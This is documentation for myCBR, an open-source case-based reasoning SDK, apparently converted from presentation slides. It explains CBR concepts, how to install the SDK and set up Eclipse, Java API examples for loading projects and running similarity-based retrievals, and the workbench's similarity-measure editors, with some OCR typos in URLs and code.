"google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 25174, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 25174, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 25174, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 25174, null]], "pdf_page_numbers": [[0, 148, 1], [148, 254, 2], [254, 328, 3], [328, 462, 4], [462, 925, 5], [925, 1088, 6], [1088, 1172, 7], [1172, 1172, 8], [1172, 1210, 9], [1210, 1382, 10], [1382, 1382, 11], [1382, 1748, 12], [1748, 2178, 13], [2178, 2178, 14], [2178, 2228, 15], [2228, 2378, 16], [2378, 2601, 17], [2601, 2601, 18], [2601, 2988, 19], [2988, 2988, 20], [2988, 3224, 21], [3224, 3542, 22], [3542, 3601, 23], [3601, 3770, 24], [3770, 4079, 25], [4079, 4630, 26], [4630, 4828, 27], [4828, 4915, 28], [4915, 5297, 29], [5297, 5297, 30], [5297, 5639, 31], [5639, 6063, 32], [6063, 6437, 33], [6437, 6589, 34], [6589, 6952, 35], [6952, 7248, 36], [7248, 7531, 37], [7531, 7988, 38], [7988, 8165, 39], [8165, 8233, 40], [8233, 8637, 41], [8637, 8944, 42], [8944, 9190, 43], [9190, 9530, 44], [9530, 9765, 45], [9765, 9882, 46], [9882, 10068, 47], [10068, 10268, 48], [10268, 10419, 49], [10419, 10749, 50], [10749, 10946, 51], [10946, 11122, 52], [11122, 11399, 53], [11399, 11553, 54], [11553, 11809, 55], [11809, 11965, 56], [11965, 12022, 57], [12022, 12572, 58], [12572, 13224, 59], [13224, 13380, 60], [13380, 13512, 61], [13512, 13696, 62], [13696, 14068, 63], [14068, 14540, 64], [14540, 14819, 65], [14819, 15086, 66], [15086, 15474, 67], [15474, 16445, 68], [16445, 16943, 69], [16943, 17238, 70], [17238, 17525, 71], [17525, 17873, 72], [17873, 18239, 73], [18239, 18425, 74], [18425, 18885, 75], [18885, 19347, 76], [19347, 19658, 77], [19658, 19712, 78], [19712, 19780, 79], [19780, 20013, 80], [20013, 20205, 81], [20205, 20380, 82], [20380, 20675, 83], [20675, 20895, 84], [20895, 21125, 85], [21125, 21446, 86], [21446, 21718, 87], [21718, 22134, 88], [22134, 22246, 89], [22246, 22618, 90], [22618, 23142, 91], [23142, 23396, 92], [23396, 23976, 93], [23976, 24060, 94], [24060, 24734, 95], [24734, 24954, 96], [24954, 25174, 97]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 25174, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-08
|
2024-12-08
|
63aa8d87f6209603bb82d15891d87f3f60320f35
|
documentation:
Competence Center for Case-based reasoning, DFKI, Kaiserslautern
Centre for model-based software engineering and explanation-aware computing, University of West London, UK
SDK for building and integrating CBR systems
Table of Contents
- What is CBR
- Knowledge formalisation in CBR
- The CBR cycle (the four ‘R’)
- CBR areas of application
- What's myCBR
- Architecture diagram
- myCBR sources and documentation
- Prerequisites
- Prerequisites for development
- Information's for developers
- How to install myCBR (getting started)
- How to install within Eclipse (for Developers)
- What and How to start
- myCBR Application design
- myCBR SDK integration
- myCBR the workbench GUI explained
- myCBR getting started: modelling your domain knowledge
- myCBR getting started: refining your knowledge model
What is CBR
**What is CBR**
**The assumption of CBR:** Similar problems have similar solutions
**The general approach:** Experiences are stored as cases with a problem description part and a solution part
**To solve a new problem:** The formal problem description is presented to the CBR system. Then similar cases with similar problem descriptions are retrieved by the system. The experiences (solution part) of the most similar case is then reused to solve the new problem presented to the system.
What is CBR
*The knowledge formalisation for CBR: Knowledge Containers*
**Similarity Measures**
The retrieval of similar cases is based upon the use of similarity functions (or measures) to compute the distance or similarity of two cases.
**Case base**
The systems experience is stored as cases within the case base which can be seen as a special form of a data base.
**Vocabulary**
The cases themselves, the similarity measures and the adaptation knowledge are composed upon a vocabulary that contains the objects of interests (terms, attributes, concepts).
**Adaptation knowledge**
Adaptation knowledge is used whenever a retrieved case’s solution has to be adapted to be suitable to solve the presented problem. An example for this kind of knowledge is given by adaptation rules like “If X is not available use Y instead.”
Examples of CBR in human reasoning
- A medical doctor remembers the case history of another patient.
- A lawyer argues with similar original precedence.
- An architect studies the construction of existing buildings to base his new designs on it.
- A work scheduler remembers the construction steps of a similar work piece.
- A mathematician tries to transfer a known proof to a new problem.
- A service technician remembers a similar defect at another device.
- A salesperson recommends similar products to similar customers.
The four steps of the CBR cycle: The 4 R’s
**Retrieve:** the most similar case or cases: The case(s) with the most similar problem description(s)
**Reuse:** the information/experience stored in the solution descriptions of the retrieved case(s) to solve the presented problem
**Revise:** the retrieved solution if it is necessary to solve the presented problem in a satisfying way
**Retain:** the tested adapted new solution/experience as a new case, consisting of the presented problem description and the adapted solution description as a new experience in the case base
Applications of CBR
CBR is capable of *automating* the tasks of *planning, diagnosis, design* and *recommending*.
It is used in a wide variety of successful business solutions. At the current time CBR is one of the most used AI methodologies within commercial applications.
Application possibilities/analogies for CBR:
- A medical doctor remembers the case history of another Patient
- A lawyer argues with similar original precedence
- An architect studies the construction of existing building
- A work scheduler remembers the construction steps of a similar work piece
- A mathematician tries to transfers a known proof to a new problem
- A service technician remembers a similar defect at another device
What is myCBR
SDK for building and integrating CBR systems
**myCBR is an open-source case-based reasoning tool hosted at DFKI**
myCBR enables you to build CBR systems and their knowledge and to use them in your applications.
Its aims are:
- to be easy to use
- to enable fast prototyping
- to be extendable and adaptable
- to integrate state-of-the-art CBR functionality
myCBR supports the teaching and research of the CBR approach by offering an easy way to prototype CBR engines.
*You can download the latest version here:* [http://mycb-r-project.net/download.html](http://mycb-r-project.net/download.html)
myCBR is developed as open source software currently by these Institutions:
- Competence Center for Case-based reasoning at the German Research Center for Artificial Intelligence
- Centre for model-based software engineering and explanation-aware computing at the University of West London
SDK for building and integrating CBR systems
Current Features of myCBR
- Powerful GUIs for modelling knowledge-intensive similarity measures
- Similarity-based retrieval functionality
- Export of domain model (including similarity measures) in XML
- Extension to structured object-oriented case representations, including helpful taxonomy editors
- Powerful textual similarity modelling
- Scriptable similarity measures using Jython
- Rapid prototyping via CSV
- Improved scalability
- Simple data model (applications can easily be build on top)
- Fast retrieval results
- Rapid loading of large case bases
// add a case base to the project
DefaultCaseBase newcasebase = project.createDefaultCB("myCaseBase");
// add a case to the case base
Instance instance = car.addInstance("car1");
instance.addAttribute(manufacturerDesc.getAttribute("BMW"));
newcasebase.addCase(i, "car1");
// set up query, define a query instance and do a retrieval
Retrieval results = new Retrieval(car);
Instance query = results.getQuery();
query.addAttribute(manufacturerDesc.getName(), manufacturerDesc.getAttribute("Audi"));
SDK for building and API for integrating CBR systems in your Application
**Modelling the domain:**
- Vocabulary (Attributes, Concepts)
- Similarity measures
- Adaptation knowledge
**Case base editing:**
- add/remove cases
- import/export data (CSV, XML)
- create, edit, optimise case base(s)
**Retrieval Engine:**
- Test the retrieval within your model
**CBREngine**
- Explanation knowledge
- Case base(s)
**Workbench**
**SDK [API]**
- load/control a project
- post query
- retrieve cases
- Load/control case bases
**Java- or Android based Application**
Info's on myCBR
## Modularization of the project
The project is well modularized which should offer potential developers easy access to the code structure and class hierarchy of myCBR. The [java documentation](http://mycb-project.net/doc/index.html) is available here:
<table>
<thead>
<tr>
<th>Package Name</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>de.dfki.mycbr.core</td>
<td>Contains all classes that represent core functionality of a CBR application such as the domain model, case bases, similarity functions and retrieval algorithms.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.action</td>
<td>Defines classes for specifying actions that operate on Observable objects.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.casebase</td>
<td>Contains classes for the basic definition of DefaultCaseBase objects.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.explanation</td>
<td>Explanations provide additional information on all myCBR concepts.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.model</td>
<td>Contains classes for the basic definition of the project's model.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.retrieval</td>
<td>All retrieval algorithms extend the abstract class RetrievalEngine and can be used within Retrieval objects to obtain the retrieval results (possibly ordered pairs of case and corresponding similarity).</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.similarity</td>
<td>Contains standard classes to maintain similarity functions for attribute descriptions (local similarity functions) and concepts (amalgamation functions).</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.similarity.config</td>
<td>Contains various enumerations specifying configurations for the corresponding similarity function.</td>
</tr>
<tr>
<td>de.dfki.mycbr.io</td>
<td>Contains classes that handle import and export of relevant CBR application data.</td>
</tr>
<tr>
<td>de.dfki.mycbr.util</td>
<td>Contains utility classes that are useful but do not have a special meaning for case-based reasoning applications.</td>
</tr>
</tbody>
</table>
Web Sources for myCBR
Your **web source** for myCBR:
https://git.opendfki.de/public
System Requirements
The **minimum system requirements** to run myCBR are:
- Essentially any PC that is able to run a Java Runtime Environment with reasonable performance is ok to use myCBR.
- CBR engines developed with myCBR are slim/efficient enough to be run on recent smartphones without limitations.
**Software requirements** to run the myCBR SDK standalone:
- Java Runtime Environment (JRE) preferable in its latest version but the minimum version required is: 1.6
Prerequisites for development
If you plan to **develop the myCBR SDK** further you need these additional prerequisites to be able to do so:
The **Java Development Kit (JDK)** with minimum version 1.6. however the most recent version recommended. You can find the JDK here:
A **Java-Development Environment (JDE)**, we recommend Eclipse, which you can find here:
http://www.eclipse.org/downloads/
If you want to integrate **repository access** to the **mycb.r.opendfki.de project** into you development environment we recommend to use a plugin to do so, for example to integrate the subversion repository into the Eclipse JDE we recommend the **Subclipse Plug-In** which you can find here: http://subclipse.tigris.org/
To sign up for the open source development community of myCBR, get an opendfki account here:
http://www.opendfki.de/
Repository access to the project (opendfki account required):
https://mycbi.opendfki.de/repos/mycb-r-gui
During your account registration you can chose which project you like to contribute to. To contribute chose myCBR.
There is currently only the java doc available as a basis for reading into the projects source. This will be amended shortly by additional available material for developers.
As you are invited to add to, refactor and optimise the myCBR SDK we are still following a strict policy with the acceptance of new versions of the SDK. This policies require the passing of a series of j-unit tests that are available with the source of the SDK also. The last decision of new versions/features of the SDK still lies with the two Centres currently leading the development of the SDK at the DFKI and the UWL.
Information's for developers
The DFKI and UWL maintain a **Wiki for all information about the current development** of the myCBR SDK. However being able to access this Wiki depends on getting a user account for which you can contact christian.sauer@uwl.ac.uk.
You can find the Wiki here: [http://mycbropendfki.de/](http://mycbropendfki.de/)
To get signed up to the **mailing list of myCBR developers** and get updates about the latest developments you can contact: [cbr@dfki.uni-kl.de](mailto:cbr@dfki.uni-kl.de).
If you want to get a **broader view and the latest developments in CBR** you may also consider signing up for the CBR Wiki, to be found here: [http://cbrwiki.fdi.ucm.es/mediawiki/index.php/Main_Page](http://cbrwiki.fdi.ucm.es/mediawiki/index.php/Main_Page)
myCBR Installation
How to install the myCBR SDK on a Windows 7 PC
1. Download the zip archive (binaries) from the myCBR download website:
http://mycbrr-project.net/download.html
This archive contains all files for the ‘product’ version of the myCBR SDK
2. Unzip the contents of the mycbrr.zip in a single folder.
The contents of your new myCBR folder should look like pictured here.
3. To Start myCBR simply run (double-click) the myCBR.exe file
The start-up may take a while...
SDK for building and integrating CBR systems
If everything went correct (be patient as it is a java application the start of myCBR might take up to 30 seconds) your first Impression of myCBR should look like this:
myCBR installation for developers
Prerequisite 1: Subversion integrated into Eclipse: Subclipse
Installation: In Eclipse open the Help menu → Install new software → Enter the path at “Work with:” http://subclipse.tigris.org/update 1.4.x → Choose Subclipse and all of its components.
Installation of the Development Environment
For older versions of the JDE (Eclipse) or if you want to work with older versions then version 3.0 of myCBR you might need the Eclipse: **Standard Widget Toolkit (SWT)**
This shouldn’t be necessary with most recent Eclipse/myCBR versions but if you have to include SWT into your Eclipse JDE make sure you do so before you move on to configure your myCBR project.
You can download the SWT here: [http://www.eclipse.org/swt/](http://www.eclipse.org/swt/)
Installation: Include SWT as a project (might be needed on older version of Eclipse)
Import → Existing Projects into Workspace
Installation of the Development Environment
Eclipse: Standard Widget Toolkit installation (continued)
Chose the path to your downloaded SWT zip archive → Select the project (org.eclipse.swt) → Finish
Installation of the Development Environment
Eclipse: Standard Widget Toolkit installation (continued)
If your SWT installation was successful, you should have a project like this:
**Prerequisite 2: Import the myCBR project** from the repository at the DFKI
File → Import → SVN → Checkout Projects from SVN → Next →
Create a new repository location: URL: [https://mycbr.opendfki.de/repos/mycbrr/gui/trunk](https://mycbr.opendfki.de/repos/mycbrr/gui/trunk) → Next
Installation of the Development Environment
Prerequisite 2: **Import the myCBR project** from the repository at the DFKI (continued)
Select the project as shown below, make sure to tick the checkbox ‘Check out as a project in the workspace’. **Check out the HEAD revision** and select **fully recursive** and **allow for unversioned obstructions** → Finish
Prerequisite 2: **Import the myCBR project** from the repository at the DFKI (continued)
If all went okay you should have a project like this in your Eclipse JDE:
Have a look at `mycbrr.product`, this is what you need to configure to launch myCBR from your JDE.
Launching myCBR from the JDE
Double-click ‘mycbbr.product’ in your project tree: Select the Dependencies Tab → Remove All
Launching myCBR from the JDE
Click on ‘Add…’ → (and then select) `de.dfki.mycbr.gui` → OK
Launching myCBR from the JDE
Click on ‘Add required Plug-Ins’ to let Eclipse integrate all necessary Plug-Ins for myCBR to run.
Launching myCBR from the JDE
Back in the ‘Overview’ Tab make sure that the checkbox ‘The product includes native launcher artifacts’ is ticked.
You can now select ‘Launch an Eclipse application’ to start the myCBR SDK.
myCBR Application design and API use
myCBR Application design
Integrating a myCBR engine in your project can be achieved in different ways:
Direct myCBR integration into an application:
You can integrate the myCBR library directly into your java program and load myCBR engines and case-bases into your program to execute queries on them.
Central myCBR engine server and several clients: (alpha stadium development)
You can run a central server which integrates the myCBR library into a server-based java program and then process queries, deliver query-results to thin clients.
Additionally: mobile application (alpha stadium development)
There is currently a mobile centered version of myCBR under development which targets particularly the needs of Android-based development. This version of myCBR is available to developers yet.
All designs: Create an **Instance of CBREngine** and use this to load your model data and case base. After finishing loading all data into your Instance of CBREngine you do retrievals from this CBREngine by posting query instances to it and retrieving result sets, containing lists of best matching cases (Instances).
myCBR Application design: Thin Client
API use for building and integrating your CBR Engine
Thin Client Diagram: Web frontend, Server (myCBR), Query-Retrieval (for example using JSP)
myCBR Application design: Thin Client
API use for building and integrating your CBR Engine: Using the API
Fat Client Diagram: Application also hosts the CBR Engine
myCBR SDK integration
Loading an engine/myCBR project
Don’t forget to import the necessary libraries: These are (depending on what you plan to do with your cbr engine):
Several ways to do things with the myCBR API
We chose a most simple one, which might not be most flexible or efficient but is easy to follow as a start for developers new to myCBR. Feel free to use it however you like
Our basic approach:
In your Application class: Create an Instances of CBREngine
Load model and data (case base) into this engine
Construct your Query instance using the engine
Query the engine with the query instance
Use the result (sets) returned by the engine
The following is a walkthrough of the example given in the end of this chapter.
Overview: CBREngine
Don’t forget to define your (myCBR)-project variables in your **copy** (**sourcecode**) of the Class “CBREngine”
## Constructor and Description
<table>
<thead>
<tr>
<th>Method</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>CBREngine()</strong></td>
<td></td>
</tr>
</tbody>
</table>
## Methods
<table>
<thead>
<tr>
<th>Modifier and Type</th>
<th>Method and Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>de.dfki.mycbr.core.Project</td>
<td>createCBRProject() This methods creates a myCBR project and loads the cases in this project.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.Project</td>
<td>createemptyCBRProject() This methods creates an EMPTY myCBR project.</td>
</tr>
<tr>
<td>de.dfki.mycbr.core.Project</td>
<td>createProjectFromPRJ() This methods creates a myCBR project and loads the project from a .prj file</td>
</tr>
<tr>
<td>static java.lang.String</td>
<td>getCaseBase()</td>
</tr>
<tr>
<td>static java.lang.String</td>
<td>getConceptName()</td>
</tr>
<tr>
<td>static java.lang.String</td>
<td>getCsv()</td>
</tr>
<tr>
<td>static java.lang.String</td>
<td>getProjectName()</td>
</tr>
<tr>
<td>static void</td>
<td>setCasebase(java.lang.String casebase)</td>
</tr>
<tr>
<td>static void</td>
<td>setConceptName(java.lang.String conceptName)</td>
</tr>
<tr>
<td>static void</td>
<td>setCsv(java.lang.String csv)</td>
</tr>
<tr>
<td>static void</td>
<td>setProjectName(java.lang.String projectName)</td>
</tr>
</tbody>
</table>
Define your project in the CBREngine java
Define your (myCBR)-project variables in your copy of the Class “CBREngine”
Set path to myCBR projects:
//private static String data_path, for example = "C:\myCBRprojects\project\";
private static String data_path = "K:\Example_Projects\examples\";
Project specific variables:
// name of the project file
private static String projectName = "NewExampleProject.prj";
// name of the central concept
private static String conceptName = "Car";
// name of the csv containing the instances
private static String csv = "cars_casebase.csv";
// set the separators that are used in the csv file
private static String columnseparator = ";";
private static String multiplevalueseparator = ",";
// name of the case base that should be used; the default name in myCBR is CB_csvImport
private static String casebase = "CarsCB";
Don’t forget to import the neccessary libraries (Check with Ctrl+Shift+o in Eclipse)
Usually these libraries are:
```java
import java.text.ParseException;
import java.util.List;
import de.dfki.mycbr.core.Project;
import de.dfki.mycbr.core.casebase.Instance;
import de.dfki.mycbr.core.model.Concept;
import de.dfki.mycbr.core.model.FloatDesc;
import de.dfki.mycbr.core.model.IntegerDesc;
import de.dfki.mycbr.core.model.SymbolDesc;
import de.dfki.mycbr.core.retrieval.Retrieval;
import de.dfki.mycbr.core.retrieval.Retrieval.RetrievalMethod;
import de.dfki.mycbr.core.similarity.Similarity;
import de.dfki.mycbr.io.CSVImporter;
import de.dfki.mycbr.core.*;
import de.dfki.mycbr.core.model.*;
import de.dfki.mycbr.util.Pair;
import de.dfki.mycbr.io.CSVImporter;
```
Loading a project into the Engine and preparing the data
//Within your Application class: Create your instance of the CBR ENGINE (named „engine“ here)
CBREngine engine = new CBREngine();
//Create a Project (named “rec” here) and load all necessary data into it
Project rec = engine.createProjectFromPRJ();
// create a case base (named “cb” here)
// and assign the case base to be used for submitting a query
DefaultCaseBase cb = (DefaultCaseBase) rec.getCasesBases().get(engine.getCaseBase());
// create a Concept (named “myConcept” here) of the main Concept (type) of the Project;
Concept myConcept = rec.getConceptByID(engine.getConceptName());
Prepare a query I: Retrieval and query instance
// create a new retrieval (called “ret” here)
Retrieval ret = new Retrieval(myConcept, cb);
// specify the retrieval method
ret.setRetrievalMethod(RetrievalMethod.RETRIEVE_SORTED);
// available retrieval methods are: RETRIEVE, RETRIEVE_SORTED, RETRIEVE_K, RETRIEVE_K_SORTED
// create a query instance (named “query” here) / A query instance essentially is a case that will
// have assigned the values to its attributes that specify the query
Instance query = ret.getQueryInstance();
Prepare a query II: Insert values
// Insert values into the query: Symbolic Description
SymbolDesc colorDesc = (SymbolDesc) myConcept.getAllAttributeDescs().get("Color");
query.addAttribute(colorDesc,colorDesc.getAttribute("Green"));
// Insert values into the query: Float Description
FloatDesc priceDesc = (FloatDesc) myConcept.getAllAttributeDescs().get("Price");
try {
query.addAttribute(priceDesc,priceDesc.getAttribute("4799.0"));
} catch (ParseException e) {e.printStackTrace();}
FloatDesc mileageDesc = (FloatDesc) myConcept.getAllAttributeDescs().get("Mileage");
try {
query.addAttribute(mileageDesc,mileageDesc.getAttribute("10000"));
} catch (ParseException e) {e.printStackTrace();}
Perform retrieval and use result
See the example JSP project for a more complex use and display of the retrieval result.
```java
// perform retrieval
ret.start();
// get the retrieval result as a List (named “result” here)
List <Pair<Instance, Similarity>> result = ret.getResult();
if( result.size() > 0 ){
String casename = result.get(0).getFirst().getName(); // get the case name
Double sim = result.get(0).getSecond().getValue(); // get the similarity value
answer = "I found "+casename+" with a similarity of "+sim+" as the best match.";
}
else{ System.out.println("Retrieval result is empty"); }
```
Selection and use of Amalgamation functions
Remember: An amalgamation function is a weighted sum of all local similarities (attribute similarities) of a concept that constitutes the overall global similarity measure of the concept.
Sometimes it can be useful to be able to switch between different amalgamation functions, for example to comply to different user preferences within different user groups. The myCBR API allows you to access and use different amalgamation functions, which you have modelled before using the workbench.
//List all available amalgamation functions for a concept
List<AmalgamationFct> liste = myConcept.getActiveAmalgamFcts();
//Set an amalgamation function to be used for the similarity computation of a concept
myConcept.setActiveAmalgamFct(Amalgamation function amalgam);
API in general: loading a myCBR project
If you don’t want to use the CBREngine class you find the general API command to handle projects etc. In the following slides:
```java
// To load new project use:
// data_path thereby pointing to the path where the project is stored+the projects name
Project myproject = new Project(data_path+projectName);
// To create a concept and get the main concept of the project.
// The name (conceptName) has to be specified at the beginning of your class-code
Concept myconcept = project.getConceptByID(conceptName);
// Initialize CSV Import with this code: (data_path: Path to your csv folder + the csv-file itself)
CSVImporter mycsvImporter = new CSVImporter(data_path+csv, myconcept);
// To set the separators that are used in the csv file use these codes.
csvImporter.setSeparator(columnseparator); // column separator
csvImporter.setSeparatorMultiple(multiplevalueseparator); // multiple value separator
API in general: importing project data
// To prepare the data for the import of the project data in csv-format you can use these methods:
csvImporter.readData(); // read csv data
csvImporter.checkData(); // check formal validity of the data
csvImporter.addMissingValues(); // add missing values with default values
csvImporter.addMissingDescriptions(); // add default descriptions
// Finally to do the import of the instances of the Concept defined use:
csvImporter.doImport(); // Import the data into the project
API in general: querying your project
Initiate a query:
```java
// create a new retrieval
Retrieval ret = new Retrieval(myConcept, cb);
// specify the retrieval method
ret.setRetrievalMethod(RetrievalMethod.RETRIEVE_SORTED);
// available retrieval methods are: RETRIEVE, RETRIEVE_SORTED, RETRIEVE_K, RETRIEVE_K_SORTED
// create a query instance
Instance query = ret.getQueryInstance();
```
API in general: querying your project
Insert values into the query:
// Symbolic Description
SymbolDesc manufacturerDesc = (SymbolDesc) myConcept.getAllAttributeDescs().get("Manufacturer");
query.addAttribute(manufacturerDesc,manufacturerDesc.getAttribute("bmw"));
// Float Description
FloatDesc priceDesc = (FloatDesc) myConcept.getAllAttributeDescs().get("Price");
query.addAttribute(priceDesc,priceDesc.getAttribute("47699.0"));
// Int Description
IntegerDesc yearDesc = (IntegerDesc) myConcept.getAllAttributeDescs().get("Year");
query.addAttribute(yearDesc,yearDesc.getAttribute("1996"));
API in general: querying your project
Insert values into the query (continued):
```java
// String Description
StringDesc titleDesc = (StringDesc) myConcept.getAllAttributeDescs().get("Title");
query.add Attribute(titleDesc, titleDesc.getAttribute("Cheese-Crusted Chicken with Cream"));
// Symbolic Description and multiple Values
SymbolDesc methodDesc = (SymbolDesc) myConcept.getAllAttributeDescs().get("Method");
// define a list that will be used to store the values
LinkedList<Attribute> list = new LinkedList<Attribute>();
// add query values to the list
list.add(methodDesc.getAttribute("roast"));
list.add(methodDesc.getAttribute("arrange"));
list.add(methodDesc.getAttribute("warm up"));
list.add(methodDesc.getAttribute("stir"));
list.add(methodDesc.getAttribute("cook"));
list.add(methodDesc.getAttribute("melt"));
// create a multiple attribute and add the attribute's description and the specified list
MultipleAttribute<SymbolDesc> mult = new MultipleAttribute<SymbolDesc>(methodDesc, list);
// add the query attribute to the list
query.add Attribute(methodDesc.getName(), mult);
```
API in general: execute a query / use result
Execute the query (do the retrieval):
```java
// perform retrieval
ret.start();
// get the retrieval result
List<Pair<Instance, Similarity>> result = ret.getResult();
// get the case name
result.get(0).getFirst().getName();
// get the similarity value
Result.get(0).getSecond().getValue();
```
API in general: accessing the model
// get all attributes of the CBR case model
HashMap<String, AttributeDesc> valueMap = myConcept.getAllAttributeDescs();
// get the allowed values for each Attribute
for (Map.Entry<String, AttributeDesc> entry: valueMap.entrySet()) {
System.out.println(entry.getValue());
AttributeDesc attdesc = entry.getValue();
String attClass = attdesc.getClass().toString();
if (attClass.compareTo("class de.dfki.mycbr.core.model.SymbolDesc")==0){
SymbolDesc symbolDesc = (SymbolDesc) entry.getValue();
Set<String> elements = symbolDesc.getAllowedValues();
for (String allowedValue : elements) {
System.out.println("\t\t"+allowedValue);
}
}
}
myCBR SDK integration
Directly create a project and enter data into it, create a query and run the retrieval in its most compact form:
// requires myCBR 3.1
Project p = new Project();
// Create Concept Car
Concept car = p.createTopConcept("Car");
// add symbol attribute
HashSet<String> manufacturers = new HashSet<String>();
String[] manufacturersArray = { "BMW", "Audi", "VW", "Ford","Mercedes", "SEAT", "FIAT" };
manufacturers.addAll(Arrays.asList(manufacturersArray));
SymbolDesc manufacturerDesc = new SymbolDesc(car,"manufacturer",manufacturers);
// add table (similarity) function
SymbolFct manuFct = manufacturerDesc.addSymbolFct("manuFct", true);
manuFct.setSimilarity("BMW", "Audi", 0.60d);
manuFct.setSimilarity("Audi", "VW", 0.20d);
manuFct.setSimilarity("VW", "Ford", 0.40d);
// add case base
DefaultCaseBase cb = p.createDefaultCB("myCaseBase");
// add case
Instance i = car.addInstance("car1");
i.addAttribute(manufacturerDesc,manufacturerDesc.getAttribute("BMW"));
cb.addCase(i, "car1");
// set up query and retrieval
Retrieval r = new Retrieval(car);
Instance q = r.getQuery();
q.addAttribute(manufacturerDesc.getName(),manufacturerDesc.getAttribute("Audi"));
r.start();
// r now contains the retrieved best case(s)
myCBR workbench: GUI elements
Main View Elements
File Menu:
- Open/Save Projects
- Model: Actions available for Models, Concepts, Attributes
Shortcuts for:
- Create, Open and Open recent projects
The Projects View:
- This view provides an overview of your currently opened projects in a tree structure. It further provides all necessary actions to add/remove elements to/from your model.
The Similarity Measure view:
- This view shows you the assigned Similarity Measures for a selected Project, Concept or Attribute. It further provides the actions to add or remove Similarity Measures to the selected Project, Concept or Attribute.
Main View:
- This is where you get detailed information and ways for interactions with your model for a selected component of your model.
Perspective Tabs:
- Selecting the Tabs switches between the different available Perspectives in myCBR. The two main perspectives now are: Modelling, where you design your model and Case Bases where you create and optimise your Cases and Case bases.
Projects View Elements
Start a retrieval: Starts the retrieval task for the selected project
Add Concept: Add a new concept (thing) to the selected project
Add a Concept as Attribute: Add a Concept as an Attribute to the selected Concept: think of Part-of relations
Add an Attribute: Add an Attribute to a selected Concept
Delete: Delete the selected Component (Either Concept or Attribute) Every dependent Component will be deleted as well
The Project Tree:
This Tree lists every Concept within the project, a DoubleClick: shows detailed information about the project
The Concept Tree:
This Tree lists all Attributes of the selected Concept, a DoubleClick: shows detailed information about the concept
An Attribute:
A DoubleClick: shows detailed information about the Attribute.
Symbol Attribute Icon
Integer Attribute Icon
Float Attribute Icon
Similarity Measures View
Example of an added alternative Similarity Measure
The generated default Similarity Measure (In this Example for the Attribute ‘Body’ of the Car Concept)
Delete a selected Similarity Measure
Add a Similarity Measure for the selected component. To be able to add a Measure the default generated Measure must be selected.
Main View: Used cars example
- The selected component in the project tree is highlighted.
- The list of defined Similarity Measures for the selected component.
- The Tab label of the selected component.
- Main information display for the selected component.
- Tabs for the quick navigation to the different views/editors of a selected component.
The table editor is used to describe the similarity mode table. This similarity mode can be chosen for the slot type symbol.
If there are only a few values for your slot which can’t be ordered absolutely or hierarchically, you should use the table editor.
The Attribute ‘Body’ of the Concept ‘Car’ is selected.
The default (auto generated) similarity measure for the attribute ‘body’ is selected.
Symmetry: Choosing symmetric makes the similarity matrix symmetric.
Symmetry: Choosing asymmetric makes the similarity matrix asymmetric.
The diagonal which splits the either symmetric or asymmetric halves of the similarity matrix.
The colours of the fields are an optical aid to visualise the values.
Edit similarity measures: Symbol, Taxonomy
Symmetry: Selects if the similarity is symmetric or asymmetric \((f()) \) or \((f(),g())\).
Include the values of inner (abstract) notes in the similarity calculation. An inner node is for example: blue, as an abstract (class) of light_blue and dark_blue.
Select how to handle values for inner (abstract) nodes. Any Value: Any node below this node is to be considered. “I search for a blue car (but don’t mind if it is light or dark blue).”
Uncertain: Opens up access to the “Semantics of uncertain” values below to choose one semantic (See next slide).
The taxonomy editor is used to describe the similarity mode taxonomy. This similarity mode can be chosen for the slot type symbol.
You could use taxonomy as a similarity mode in case the slot’s values can be arranged in a hierarchical structure, such that:
- nodes on same levels are disjoint sets
- nodes on the last level are real-world objects
- inner nodes consist of the real-world objects that follow in the hierarchical order
The Taxonomy editor, which allows you to drag & drop nodes in the taxonomy and to enter similarity values manually by double-clicking a node.
Edit similarity measures: Symbol, Taxonomy
The taxonomy is to be used in an asymmetric way. This means that the taxonomy is used in two different ways, depending on the fact if the query value is greater than the value in the case or vice versa. Therefore the GUI provides you with the option to specify different uses of the taxonomy for the Query (Q) as well as the Case (C).
You can specify distinct ways to describe (calculate) the similarity for the query and for the case comparison.
The taxonomy editor automatically creates the table used for the table editor. So you can use the taxonomy editor to initially fill the table and then switch the similarity mode to table for manually edit the table. This is very useful in case you want to use the table editor but your project structure is very complex.
If you opt for handling values of inner nodes with uncertainty you have to specify the semantic you want to use to handle the uncertainty:
Pessimistic: Use the lower bound of the similarity (Q,C)
Optimistic: Use the upper bound of the similarity (Q,C)
Average: Use the average between the lower and upper bound
**Edit similarity measures: Integer, Simple function**
- **Symmetry**: Allows you to choose to specify a symmetric or asymmetric function, choosing asymmetric activates the input for both sides of the function (C<Q and C>Q).
- **Difference**: Calculates a numerical value for the difference between Query and Case values.
- **Quotient**: Calculates a quotient out of the Query and Case values.
- **Left side**: The function specifies the similarity for Case values lower than the Query value.
- **Right side**: The function specifies the similarity for Case values higher than the Query value.
**Constants**:
- **Constant**: Enter a value that the function will return as a constant.
- **Modelling**:
- A step in the function and the value at which it should occur.
- The polynomial change of similarity with a basic value.
- A smooth step in the function at a given value.

Edit similarity measures: Integer, Advanced function
The advanced similarity mode can be chosen for the attribute types integer and float.
You should use advanced similarity mode in case your similarity measure function cannot be represented by the standard similarity mode.
As you are modelling the function freely you should always select asymmetric for advanced integer and float functions.
Add a new similarity point to the function. To add it click the button and then enter the function value (Distance) and the desired similarity for this value.
You can add similarity points and the result will be an interpolated function for your similarity measure.
This is the List of your added similarity points to the function. You can remove points by selecting the entry in the table and then click 'Remove'.
The advanced similarity mode can be chosen for the attribute types integer and float.
